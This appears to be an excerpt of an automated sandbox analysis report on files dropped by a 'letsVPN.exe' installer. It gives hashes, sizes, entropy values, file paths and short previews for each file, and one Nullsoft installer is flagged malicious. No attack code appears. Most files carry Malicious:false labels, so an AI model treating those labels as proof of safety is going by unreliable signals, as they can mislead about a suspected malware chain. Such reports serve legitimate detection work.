                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\Users\user\Desktop\letsVPN.exe
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):49152
                                                                                                                                                                                                  Entropy (8bit):6.901141332438222
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:ZgAswxWzmF+kB7CtT2UiGuxfbM/sR/9UFF+kB7CtT2UiGux:OmWQp7rUCJ4/sR9Uvp7rUC
                                                                                                                                                                                                  MD5:AF4898E8762C23845474DFD6C6B7047E
                                                                                                                                                                                                  SHA1:0FC576A3F2467B47686F71704CA44599CBF96CAB
                                                                                                                                                                                                  SHA-256:7910A6E02CE1FE5B519633EFB910F173CAC517D56665A75B50054E0D9656F554
                                                                                                                                                                                                  SHA-512:7693AA3748A56BE4D1AC75B77F2CB8FE01FE71CC278F67ACF5E4D5E5504C9B94FEED0622BA19C09F376941B2551C7C0251409099FEBB97A9AFA167F8FC42779C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\Users\user\Desktop\letsVPN.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):209725
                                                                                                                                                                                                  Entropy (8bit):7.999155296684028
                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                  SSDEEP:3072:bV6ppx9d6U0IqLcls38CNNvbW0ZouvuEVjzR00GSMtIILB/FjzpajiE5liIw8/K+:84Ibls3BNvb9ouxk9BLDzKiMiQ/Ko+y9
                                                                                                                                                                                                  MD5:242BB7507E0B2A8038F847830F926FEC
                                                                                                                                                                                                  SHA1:C391FC67566884065EB8A16961E5405D5B44677B
                                                                                                                                                                                                  SHA-256:7BAB7993F44F9835A44FC93CCE3D513FCBAE2395DAC085DB7F0748B2A21CCA32
                                                                                                                                                                                                  SHA-512:E0E4A997638BF95A558EBB877A2D5E64F2D3A2D2A81D7F15C4453B194E18F3A5BC07589EDB3BC18FDCE1996CFB50B0B00D1FFDF421002E37608EB861F3E7D36C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\Users\user\Desktop\letsVPN.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1241344
                                                                                                                                                                                                  Entropy (8bit):6.016938637522631
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12288:HIFYX//kUg+kmWh0rHN9RSJYFAZU0L5Aflov/PfT:HIFQ//kvhkS56ev/PfT
                                                                                                                                                                                                  MD5:C2071F3E0F4D465E4A109BA7549D5619
                                                                                                                                                                                                  SHA1:0ACDE6A36599862CAEADE3E15AD6644D15520547
                                                                                                                                                                                                  SHA-256:9941DE185F7AB38CE773D41DC444FC886F8EB135A1BE5EB255DC0956DA7D1AEF
                                                                                                                                                                                                  SHA-512:D17116206B49A2D255BEB052D06997E149C5537B6DAB6654D6814325A4D20EA19EA7FC37308139FF719E22E81D75646C91523485A37BCABB8B00DD74C5DC2639
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2482688
                                                                                                                                                                                                  Entropy (8bit):6.599322698372088
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:49152:HymviY7ZdM+3023FbNifZoGlBP3+IoA7YRAt+RB48UOexIFQHkaS5Jv/PfT:HziCdt3023FbNifZ1D3+IoEt+RS8UOel
                                                                                                                                                                                                  MD5:72ADFBFC97B1F1E7ABA3F63CD264C0B2
                                                                                                                                                                                                  SHA1:93DFEBD64B0FC0AA932E23A5D4E6A32CEBE7CF32
                                                                                                                                                                                                  SHA-256:77762C479E46D1DF205EB020D4C1AF5CCD8E433111DC63BE53B2401C7B8257AC
                                                                                                                                                                                                  SHA-512:7AF6E43B7C6086646D1CAC37234658722ABDF466689AB58459468095722E66DB0ED008DA5B2F731D8FB28F60F52EA1FD0C3501C47A79678EB1F6392AF61CB004
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\Users\user\Desktop\letsVPN.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):455328
                                                                                                                                                                                                  Entropy (8bit):6.698367093574994
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12288:uZ/8wcqw2oe+Z3VrfwfNOOoWhUgiW6QR7t5ss3Ooc8DHkC2e77/:W/8wVwHZFTwFOOos3Ooc8DHkC2e77/
                                                                                                                                                                                                  MD5:FD5CABBE52272BD76007B68186EBAF00
                                                                                                                                                                                                  SHA1:EFD1E306C1092C17F6944CC6BF9A1BFAD4D14613
                                                                                                                                                                                                  SHA-256:87C42CA155473E4E71857D03497C8CBC28FA8FF7F2C8D72E8A1F39B71078F608
                                                                                                                                                                                                  SHA-512:1563C8257D85274267089CD4AEAC0884A2A300FF17F84BDB64D567300543AA9CD57101D8408D0077B01A600DDF2E804F7890902C2590AF103D2C53FF03D9E4A5
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\Users\user\Desktop\letsVPN.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):970912
                                                                                                                                                                                                  Entropy (8bit):6.9649735952029515
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12288:LBmFyjLAOQaYkxGXPfY7eiWWcpOKnpTVOIxhK765qlRRb6x4pI23IbJQV:dmFyjLF847eiWWcoGZVOIxh/WxIAIbGV
                                                                                                                                                                                                  MD5:034CCADC1C073E4216E9466B720F9849
                                                                                                                                                                                                  SHA1:F19E9D8317161EDC7D3E963CC0FC46BD5E4A55A1
                                                                                                                                                                                                  SHA-256:86E39B5995AF0E042FCDAA85FE2AEFD7C9DDC7AD65E6327BD5E7058BC3AB615F
                                                                                                                                                                                                  SHA-512:5F11EF92D936669EE834A5CEF5C7D0E7703BF05D03DC4F09B9DCFE048D7D5ADFAAB6A9C7F42E8080A5E9AAD44A35F39F3940D5CCA20623D9CAFE373C635570F7
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\Users\user\Desktop\letsVPN.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1241344
                                                                                                                                                                                                  Entropy (8bit):6.551959555603401
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24576:mVaymviYNqEZ3tt++3jyQoH0y23FbNKMipvFaSvAVrolBPZF+vIk7Am47NRkRm7l:HymviY7ZdM+3023FbNifZoGlBP3+IoAn
                                                                                                                                                                                                  MD5:66F67DA104FCAB66D963C47AEAD51677
                                                                                                                                                                                                  SHA1:5C20E591F057607EDABB939234073B7C1E1B0776
                                                                                                                                                                                                  SHA-256:6A3ADB6F15F0790EEAF07BDEBACDC8C3A7766B0CD0F9EAC0001338DA98C3DB18
                                                                                                                                                                                                  SHA-512:321E1E6F8FFE3EFA94BB3A41EF317F0525289DB1397D03FD68115F963AD74234A01459EC2143D9529B09D2C0414771B7E57715109CFF72EEF6049B97F70D3DE3
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\Users\user\Desktop\letsVPN.exe
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):258328
                                                                                                                                                                                                  Entropy (8bit):6.64001582449504
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:/BstfXX0BcNv96T+CZxJK30D62E9NTBqCmN1BIKXXuo:pI0Bc/Y5K3m62E9NTsCmNg2V
                                                                                                                                                                                                  MD5:68411B35F7B40B45AFC4A60A2681549D
                                                                                                                                                                                                  SHA1:98377319160E6DA97FD6E5D97AFE2441E0FE21A6
                                                                                                                                                                                                  SHA-256:5C3A73321F59CDC28164D79E8B60ECC57A90FF398A2CDBDE2BB718C8E9500D23
                                                                                                                                                                                                  SHA-512:CC509C4F41F86C9191BF5FBB826A362FFEF2BC78046B99356F944F39A17ED1AB17A6286FFE6AD03C290F6BBCE492F0DE96954B4C1075B27771C491C2CA027156
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1310720
                                                                                                                                                                                                  Entropy (8bit):0.830735092153805
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:gJhkM9gB0CnCm0CQ0CESJPB9JbJQfvcso0l1T4MfzzTi1FjIIXYvjbglQdmHDug0:gJjJGtpTq2yv1AuNZRY3diu8iBVqFe
                                                                                                                                                                                                  MD5:EDA19EF36B008909D2CF8EA28BAFF91E
                                                                                                                                                                                                  SHA1:5CE1CA7DA30509DDBA69969FCCCB3ADCCCD82C66
                                                                                                                                                                                                  SHA-256:34A8F3689F2E3091930FE511562B18A0D919BCFBA6A571720942E5F97BBD257A
                                                                                                                                                                                                  SHA-512:68289BD01EE8FB8015DCC80AFE3575E6033CAA57F8081B9D68976DE7AB734262ABA51E3B705712B9266F72024D6FA6A4AAE8F85421F444606FC209900EE6357A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:...M........@..@.-...{5..;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................4..........E.[.rXrX.#.........`h.................h.5.......3.....X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                  File Type:Extensible storage engine DataBase, version 0x620, checksum 0x21621030, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1310720
                                                                                                                                                                                                  Entropy (8bit):0.658617069055208
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:xSB2ESB2SSjlK/rv5rO1T1B0CZSJRYkr3g16P92UPkLk+kAwI/0uzn10M1Dn/di6:xaza9v5hYe92UOHDnAPZ4PZf9h/9h
                                                                                                                                                                                                  MD5:533B7D05CFB99E3F5B32FFBF1813909E
                                                                                                                                                                                                  SHA1:7C378B64753FC2D9EFC5FFD37498E67E6EB682C7
                                                                                                                                                                                                  SHA-256:EFB02C5B1DFE33BC7D5832D731B2326EBF026C0A1EEA6E87DB07008BD3EEDAFF
                                                                                                                                                                                                  SHA-512:5C44A4B3E883F989E918270698F0AA5A31A06859D33279CCB13D4BF39594950317173FDBFFEC879A7795D252FC6A5EA9DBE5E97336313C3DAB2FE8EED2E89C5C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16384
                                                                                                                                                                                                  Entropy (8bit):0.08126068657057003
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:fW/EYeRnQujP5tGuAJkhvekl1/+mSQujtl/ollrekGltll/SPj:u/EzRn7z5trxlbKTAJe3l
                                                                                                                                                                                                  MD5:782C4A4BE40A52A0702DAC038E22156C
                                                                                                                                                                                                  SHA1:4B858C083D3A40434CBBCA4025F33E474C31A067
                                                                                                                                                                                                  SHA-256:7D542F2467B52858A571A4CC54EA9DCF690C324FAEC44183CF031DA96F654C32
                                                                                                                                                                                                  SHA-512:1984AC16945BE3AD3EFD572F7DA7166227E28598B1DF5AC1E474393D97F68CF080CE160BADBB3C6EB375B23CEC31AB88ED53CEFD8E6EC92484043DCDA1161B4D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\Users\user\Desktop\letsVPN.exe
                                                                                                                                                                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):15448957
                                                                                                                                                                                                  Entropy (8bit):7.999985585470918
                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                  SSDEEP:393216:BwoVsxGxbiDDzWzmJ/2inHWazagVdtBrx8wXpZVYcs7:WoWG0DDzWCgin/tB97Yx
                                                                                                                                                                                                  MD5:31F107A675EF31F01B6BD9A235A0312A
                                                                                                                                                                                                  SHA1:885CAB479BF5BB49BC8B756A4D9C4BC4C1617D49
                                                                                                                                                                                                  SHA-256:B9C959D49CCD893BEAA22987475A094D573D00C4A609E534B4D55E0B3D956DBD
                                                                                                                                                                                                  SHA-512:96D28B3D1284146032B1F55BA39AA4D92CD83CA440146CD9E7F564D0D804B72C9390D78894ACAC279324C918607C1F8CFDEEE58F3FF34A20A40447A55F63B01A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\Users\user\Desktop\letsVPN.exe
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):15511576
                                                                                                                                                                                                  Entropy (8bit):7.998943488854436
                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                  SSDEEP:393216:opzmzGnkfV8tfGWcSWNKQ/kg/bZzvtMA63NiSAO:ohmSkOtfGWcSWJZzlAi+
                                                                                                                                                                                                  MD5:9F5F358AA1A85D222AD967F4538BC753
                                                                                                                                                                                                  SHA1:567404FAEC3641F4DF889C2C92164CEE92723741
                                                                                                                                                                                                  SHA-256:EB11627E59757105BDDB884540854D56B173FE42417878DE4E7D246CAC92C932
                                                                                                                                                                                                  SHA-512:D5A4C4B343704B96C98183D13D90E37065C8BE0D0ED053696FB28B5E29F1432175D5E9F63C2D2879C3EB3541E4822A64AE7BFA2230C0C00B5C3ADA0A1AC82BED
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exe
                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):28
                                                                                                                                                                                                  Entropy (8bit):3.767375797816042
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:8VEA5YxMn8Y:8VfYxMnJ
                                                                                                                                                                                                  MD5:37F9B67FC7593F3C8D37F7B3FCA1C9B9
                                                                                                                                                                                                  SHA1:2669524622FFF6C8A4158F65881CA63ACB3F3371
                                                                                                                                                                                                  SHA-256:16D81550D58EE7D98675AF4C3AC0EC93D2EFC5684D044D7DF332F3A068843D27
                                                                                                                                                                                                  SHA-512:A0EC96A93DD38D6F193DBCAEB4B4E5254EF3CDFA0E8F8A0C7DB4C2F6CE7C2DAA6B16B2596FD81BB86C1069856F15921EE139441D5A695A482E5604C8D2FB5B4C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:tLa0utG1tNG0vca1try0vby1t6Y=
                                                                                                                                                                                                  Process:C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe
                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3046001, writer version 2, read version 2, file counter 7, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):36864
                                                                                                                                                                                                  Entropy (8bit):0.6921140210664358
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:Th49h4iAtmGqPRarI7JjwrxOGmwrnfXKKfgsy/rI7JjwrxOGzmxNNoG/Xgsy/rIr:IqIdjoOofwIdjogAIddJb2id
                                                                                                                                                                                                  MD5:4A639C6E907F0C38EED44EFBA636FCD8
                                                                                                                                                                                                  SHA1:3C72EB257AB1BEDBA25A0417142D7C50B6BE5BB7
                                                                                                                                                                                                  SHA-256:F35C01500A0A76E2D574301CA3371FF7D533A1C8B58591DD82B5ABBB64099FAC
                                                                                                                                                                                                  SHA-512:CEF84F292F0EFDA27EA723B1474B3C5AC1C60D4120C7B6FA7282BF44C459AB7F2C872298A1B2EDD694F409B402DEF9C3EDBEB3E811A4EA173D56DE9D399358B4
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe
                                                                                                                                                                                                  File Type:SQLite Rollback Journal
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4616
                                                                                                                                                                                                  Entropy (8bit):3.7734765485924107
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:7MdqA9h4iAtmGqPRarI7JjwrxOGmwrnfXKKfgsy/rI7JjwrxOGzmxNNoG/Xgsy/E:7stqIdjoOofwIdjogAIddJb2idD
                                                                                                                                                                                                  MD5:ED9AA236AD76EB2C6765B88A83DC688E
                                                                                                                                                                                                  SHA1:895252E3ADE1A2850EE624E522D13BFE7C5ACBB9
                                                                                                                                                                                                  SHA-256:1B13730ACA79871CBF7C4524CAB7EB38199A7AE758BB14DE5AFF6B1B6A94821D
                                                                                                                                                                                                  SHA-512:2F10F29F07416E8D18D2A4464D8E288781566A55092E1D0A9136141DE0AC85F660C3EC6AF1A8DAD91F921A89E8621E23D212D57CB23F98DB047B285A7899618C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                                                  Entropy (8bit):0.0591149673195505
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6:GWlmtsNW8AcE4WlmtsNW8AccmR9Xml/Xml/wIol/wUEocZNm:Stck4tc8wSaIojZ
                                                                                                                                                                                                  MD5:ED79FFB1FB285DADF5EFED6B7947F41C
                                                                                                                                                                                                  SHA1:22B84FE56A6DA78044B9F559F5C5C0DF8565F10B
                                                                                                                                                                                                  SHA-256:4F21A3FAD83E8CC8C460912409BADC3A535A7B6C6D06821D07D9F56EBE2229B8
                                                                                                                                                                                                  SHA-512:30CB25F132EE5BA26B608AAFF8EED9769A86B618BA40642934D679075AA4F238E145A7388A6560BACBA12E4CFBE6949014E381AC494735C19C27445B33F46001
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe
                                                                                                                                                                                                  File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):111272
                                                                                                                                                                                                  Entropy (8bit):0.33860568672028296
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:Apstua2KRmfVRGxR0FGRnVjBKRFRIZYGRdLREmr23U074iPKRLRWr23U074ii:zcB6BVj5ZY1M2U074i/2U074ii
                                                                                                                                                                                                  MD5:BC829283CF42A13088C9FBA44E38AC1D
                                                                                                                                                                                                  SHA1:0148C3DEFC211B12CC1C12BF5C95E015942BE682
                                                                                                                                                                                                  SHA-256:2AF14BC93572742D31BFE84BB44F75B5759FF75FC6FF6CFBB59C7636A64EBAA8
                                                                                                                                                                                                  SHA-512:50FA9088105D279231BC71B85844D2AA1AE9AB799928A3F823008F31B67165B86FAB8D37FBD137B8C08735576167904CD3F0651483054243914F55C05D92F0AA
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe
                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):199
                                                                                                                                                                                                  Entropy (8bit):5.088272658260225
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:vFWWMNHU8LdgCQcIMOofqRqLVuXKCWAa8LDMBlTqqUaXKIy50NPLQaF9ULVuuQIT:TMVBd1IGpOSAMBluqT027G3QIT
                                                                                                                                                                                                  MD5:893F6F5C9E2512276F56ED8B520C7441
                                                                                                                                                                                                  SHA1:835B4F9560C539208FDE524CA0816470A034E7E8
                                                                                                                                                                                                  SHA-256:DAD7AD623FABF515AA7BC8EBBC9D763CC531F91B93F7216F9D2ED170D082768C
                                                                                                                                                                                                  SHA-512:824F153EE690EFB57BA9F682C4ABC71F79BE47E55D75F81EADDA4A30C2DA807499202F2285D2BE954D97B919807641B4026BF2B1F13CC6217B0462C59E8CD0CE
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <appSettings>.. <add key="AppCenterInstallId" value="17802164-65a0-40c7-a04c-a8cf1b8b2817" />.. </appSettings>..</configuration>
                                                                                                                                                                                                  Process:C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe
                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):199
                                                                                                                                                                                                  Entropy (8bit):5.088272658260225
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:vFWWMNHU8LdgCQcIMOofqRqLVuXKCWAa8LDMBlTqqUaXKIy50NPLQaF9ULVuuQIT:TMVBd1IGpOSAMBluqT027G3QIT
                                                                                                                                                                                                  MD5:893F6F5C9E2512276F56ED8B520C7441
                                                                                                                                                                                                  SHA1:835B4F9560C539208FDE524CA0816470A034E7E8
                                                                                                                                                                                                  SHA-256:DAD7AD623FABF515AA7BC8EBBC9D763CC531F91B93F7216F9D2ED170D082768C
                                                                                                                                                                                                  SHA-512:824F153EE690EFB57BA9F682C4ABC71F79BE47E55D75F81EADDA4A30C2DA807499202F2285D2BE954D97B919807641B4026BF2B1F13CC6217B0462C59E8CD0CE
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <appSettings>.. <add key="AppCenterInstallId" value="17802164-65a0-40c7-a04c-a8cf1b8b2817" />.. </appSettings>..</configuration>
                                                                                                                                                                                                  Process:C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe
                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3031001, file counter 11, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):12288
                                                                                                                                                                                                  Entropy (8bit):2.0333287080422964
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:TSYr2ZCg2xB32t5qxB3mdIqT9R//htI/sxB3mdIqT9R//hcAX5JxB3/WdIqT9R/Q:mJ2xJ2SxJmC89JIkxJmC89QAbxJeC89y
                                                                                                                                                                                                  MD5:5210F39F828D673DFA5489C98084E869
                                                                                                                                                                                                  SHA1:A388970EA7897BC1254A93E020261F105C103855
                                                                                                                                                                                                  SHA-256:FCF9331848120F363CF5DD4736DD8693993C77EC367F27DE3EF92EDDD506E782
                                                                                                                                                                                                  SHA-512:C7EBB3FB0D9FBDB6B18B90C448C63EA92A98332740A9645FA474A9130E15CCE3046BD3356B95BC43072DBD11C0FB3AF209D3DA283DC9791A4B8B463E214529AA
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe
                                                                                                                                                                                                  File Type:SQLite Rollback Journal
                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                  Size (bytes):12824
                                                                                                                                                                                                  Entropy (8bit):1.986820412085026
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:792xJfC89rJoxJvIkxJmC89QAbxJeC8940p:7AfC89Now0mC893eC894U
                                                                                                                                                                                                  MD5:3E9F1509B4E5C61363FEFD10079BA8E6
                                                                                                                                                                                                  SHA1:41485EC0461A5E81DA8D0F628A7B60D04E05D80E
                                                                                                                                                                                                  SHA-256:5F939CAEA006CBF072B344AB13456B755B45CDC307CB4B91C04F691F7F3BBE70
                                                                                                                                                                                                  SHA-512:92C7A08FF6A97F80FF85AB362C9273105F850B01615450D3EE948A4450501180FEC213EF88C44A99E8A51EA5520C3CBD1386DB104F3F9F38ECA5CD1C2257D290
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe
                                                                                                                                                                                                  File Type:CSV text
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2424
                                                                                                                                                                                                  Entropy (8bit):5.348163999675204
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:MxHKlYHKh3ouHgJHreylEHMHKo/tHo6hAHKzeYHKU57UjHKtHKMRtHj:iqlYqh3ou0aymsqwtI6eqzVqU57Ujqtp
                                                                                                                                                                                                  MD5:1D015055F59E3C59A292A836E94902DB
                                                                                                                                                                                                  SHA1:6606627C577A8D9FBB362C0FFFD5E500295CA4AC
                                                                                                                                                                                                  SHA-256:D72DA6BAE429BF4A293DF3A8B637CC821491A9585DEA47553D6753A50D6EE519
                                                                                                                                                                                                  SHA-512:C2484FDCB22662B80659A9BD978CB1995D1C7912E6E24AABCF917862DB74F900B4775A24EE922B7A9B41CA48B5EF82C2E13C951D2CAD716B86FA11E1687C2EFA
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\WindowsBase\4d760e3e4675c4a4c66b64205fb0d001\WindowsBase.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\17470ef0c7a174f38bdcadacc3e310ad\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\
                                                                                                                                                                                                  Process:C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):34383
                                                                                                                                                                                                  Entropy (8bit):5.053402703870376
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:QPV3IpNBQkj2Ph4iUxsfrRJv5FqvXhARlardFRgrOdBPtAHkDNZbNKeCMiYo6:QPV3CNBQkj2Ph4iUxsflJnqv6qdPgrOf
                                                                                                                                                                                                  MD5:D63CB5E171D7FCFE28C9E904F6855F08
                                                                                                                                                                                                  SHA1:8C6B004EC20FF61EF4CA9EAFA6F0254364A960AB
                                                                                                                                                                                                  SHA-256:F081E30CF5BB68206C7A59B83BC914B9BD2ED59FBEE26843075D2D0CD7393354
                                                                                                                                                                                                  SHA-512:E9F534C0087182A51D5BE60E14FA992B2B933F444D32C2A2DBA3C7D4FCD6A1F418CF7A6A8B37165A61ED4D5B096716308035E117199A5B94FA796B58C041DB74
                                                                                                                                                                                                  Malicious:false
